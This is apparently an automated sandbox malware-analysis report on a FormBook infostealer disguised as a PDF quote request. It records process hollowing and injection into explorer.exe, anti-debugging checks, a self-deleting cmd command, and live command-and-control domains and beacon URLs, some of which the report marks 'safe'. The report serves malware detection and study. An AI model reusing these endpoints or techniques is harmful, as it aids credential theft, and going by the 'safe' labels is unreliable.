          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04861074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04852073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_048241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047C2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047BC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047CA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04799240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047D4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047B3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04795210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_04795210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_0479AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 7_2_047A8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.rootedwithlovejax.com
          Source: C:\Windows\explorer.exeDomain query: www.essentials-trading.com
          Source: C:\Windows\explorer.exeDomain query: www.coloradocouponclub.com
          Source: C:\Windows\explorer.exeNetwork Connect: 107.178.142.156 80
          Source: C:\Windows\explorer.exeDomain query: www.tennesseewheelrepair.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.244.61 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Source: C:\Windows\explorer.exeDomain query: www.quickeasybites.com
          Source: C:\Windows\explorer.exeDomain query: www.ssfgasia.com
          Source: C:\Windows\explorer.exeDomain query: www.hzmsbg.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.59.242.153 80
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.161.160 80
          Source: C:\Windows\explorer.exeNetwork Connect: 216.239.36.21 80
          Source: C:\Windows\explorer.exeDomain query: www.kf350.com
          Source: C:\Windows\explorer.exeDomain query: www.1364kensington.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.desertfoxindustries.com
          Source: C:\Windows\explorer.exeDomain query: www.pierresplayhouse.com
          Source: C:\Windows\explorer.exeDomain query: www.thecapitalhut.com
          Source: C:\Windows\explorer.exeDomain query: www.luegomusic.com
          Contains functionality to prevent local Windows debuggingShow sources
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeCode function: 0_2_72AD1000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeSection loaded: unknown target: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeSection loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\control.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeSection unmapped: C:\Windows\SysWOW64\control.exe base address: E70000
          Source: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exeProcess created: C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe'
          Source: explorer.exe, 00000005.00000002.909699589.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000005.00000000.669092694.0000000005E50000.00000004.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.657552468.0000000001080000.00000002.00000001.sdmp, control.exe, 00000007.00000002.910378473.0000000003020000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000005.00000000.671246552.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.691441179.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.657014217.00000000028A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692110723.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909962529.0000000000BF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.692129319.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.909570480.0000000000700000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.652124136.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.910020309.0000000000E40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection612Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery241Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection612LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery12VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 383968 Sample: RFQ_AP65425652_032421 isu-i... Startdate: 08/04/2021 Architecture: WINDOWS Score: 100 31 www.lideresdeimmunocal.com 2->31 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 7 other signatures 2->45 11 RFQ_AP65425652_032421 isu-isu,pdf.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\fsfomt.dll, PE32 11->29 dropped 55 Maps a DLL or memory area into another process 11->55 15 RFQ_AP65425652_032421 isu-isu,pdf.exe 11->15         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 15->57 59 Maps a DLL or memory area into another process 15->59 61 Sample uses process hollowing technique 15->61 63 Queues an APC in another process (thread injection) 15->63 18 explorer.exe 15->18 injected process9 dnsIp10 33 luegomusic.com 162.241.244.61, 49764, 80 UNIFIEDLAYER-AS-1US United States 18->33 35 www.pierresplayhouse.com 199.59.242.153, 49771, 80 BODIS-NJUS United States 18->35 37 19 other IPs or domains 18->37 47 System process connects to network (likely due to code injection or exploit) 18->47 22 control.exe 18->22         started        signatures11 process12 signatures13 49 Modifies the context of a thread in another process (thread injection) 22->49 51 Maps a DLL or memory area into another process 22->51 53 Tries to detect virtualization through RDTSC time measurements 22->53 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          RFQ_AP65425652_032421 isu-isu,pdf.exe35%VirustotalBrowse
          RFQ_AP65425652_032421 isu-isu,pdf.exe42%ReversingLabsWin32.Trojan.Wacatac
          RFQ_AP65425652_032421 isu-isu,pdf.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsa82C7.tmp\fsfomt.dll23%ReversingLabsWin32.Trojan.Wacatac

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.1.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.control.exe.4ca7960.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.28a0000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          7.2.control.exe.a0a460.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          0.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.72ad0000.5.unpack100%AviraHEUR/AGEN.1131513Download File
          2.2.RFQ_AP65425652_032421 isu-isu,pdf.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.1364kensington.com/pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.thecapitalhut.com/pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.desertfoxindustries.com/pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.kf350.com/pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.tennesseewheelrepair.com/pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          https://rootedwithlovejax.com0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          www.luegomusic.com/pe0r/0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.rootedwithlovejax.com/pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.pierresplayhouse.com/pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.ssfgasia.com/pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI00%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          luegomusic.com
          		162.241.244.61
          		truetrue
            		unknown
            ssfgasia.com
            		34.102.136.180
            		truefalse
              		unknown
              desertfoxindustries.com
              		184.168.131.241
              		truetrue
                		unknown
                www.rootedwithlovejax.com
                		216.239.36.21
                		truefalse
                  		unknown
                  td-balancer-euw2-6-109.wixdns.net
                  		35.246.6.109
                  		truefalse
                    		unknown
                    www.kf350.com
                    		107.178.142.156
                    		truetrue
                      		unknown
                      www.1364kensington.com
                      		66.96.161.160
                      		truetrue
                        		unknown
                        www.pierresplayhouse.com
                        		199.59.242.153
                        		truetrue
                          		unknown
                          tennesseewheelrepair.com
                          		184.168.131.241
                          		truetrue
                            		unknown
                            www.essentials-trading.com
                            		unknown
                            		unknowntrue
                              		unknown
                              www.coloradocouponclub.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.tennesseewheelrepair.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.quickeasybites.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.ssfgasia.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.hzmsbg.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.lideresdeimmunocal.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.desertfoxindustries.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.thecapitalhut.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.luegomusic.com
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.1364kensington.com/pe0r/?jfIla4=0Af10zgbdIViNGwjb+Oc1SkLmd7m2ZIFRN/3MUqpHhZEI8ml+kTCEnXA5UxsPaJdSh4V&Yn=ybIHhf989FGTI0true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.thecapitalhut.com/pe0r/?jfIla4=Vv4dR0U6ZhUzqX7Ytdkdbkwy06eZp55JqV7JXJhskJ3M1IOX6fIf5GSNO8ms0pPBZaWn&Yn=ybIHhf989FGTI0false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.desertfoxindustries.com/pe0r/?jfIla4=z013FEPTRo1x+Iqvqy0nQ5Mm93icoZ0Dm/8PgHcP3O5T8Pkz5lNKJ8Gozvwfum0Zfhau&Yn=ybIHhf989FGTI0true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.kf350.com/pe0r/?jfIla4=EMcf7Z3h8uf0azWCSj7jkXkAyIPNvPvgl8GMAOH4p84rD0pfCkD41qqmtAVLjT1e92o/&Yn=ybIHhf989FGTI0true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.tennesseewheelrepair.com/pe0r/?jfIla4=k6IhwNTsJPfJwlNAMD3cJduEXu+3VJeDR1xGn86Kxw1vpoAhQbb58cNQY6a9WWBFRY7O&Yn=ybIHhf989FGTI0true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                www.luegomusic.com/pe0r/true
                                                • Avira URL Cloud: safe
                                                		low
                                                http://www.luegomusic.com/pe0r/?jfIla4=DC2ddi2Ahi6YucIUNrYQstcO22XqbhtBVWVPx2koYqqK6B4m9xBdRgLT1ADwKwfYgKFO&Yn=ybIHhf989FGTI0true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.rootedwithlovejax.com/pe0r/?jfIla4=RrzzznHzvm1EAZS+513FKVr8vjbHVsjAfprUxrbk/aZWUqXE85HdCV+tXjNxRxdlhlWL&Yn=ybIHhf989FGTI0false
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.pierresplayhouse.com/pe0r/?jfIla4=gvANDtPFS4AFIzDAH1LQr3uVNv4G+On6xarGfoEbOyx7OA32EqtB1F0pQLcAKQ6/fBeV&Yn=ybIHhf989FGTI0true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.ssfgasia.com/pe0r/?jfIla4=edFFfaJfWRXJQQLXD8x02lpY2DcNAoQTA5Xlo1ZOoFa5RERkTfJxxWby4PUnbOfP3siZ&Yn=ybIHhf989FGTI0false
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.comexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designersGexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designers/?explorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000005.00000000.673526419.000000000B976000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        		unknown
